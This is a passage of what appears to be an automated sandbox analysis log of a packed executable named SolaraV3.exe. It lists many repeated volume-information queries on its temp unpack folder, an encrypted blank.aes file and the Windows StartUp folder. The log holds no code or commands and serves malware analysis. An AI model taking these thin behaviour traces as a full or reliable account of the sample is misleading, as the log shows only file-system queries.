Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
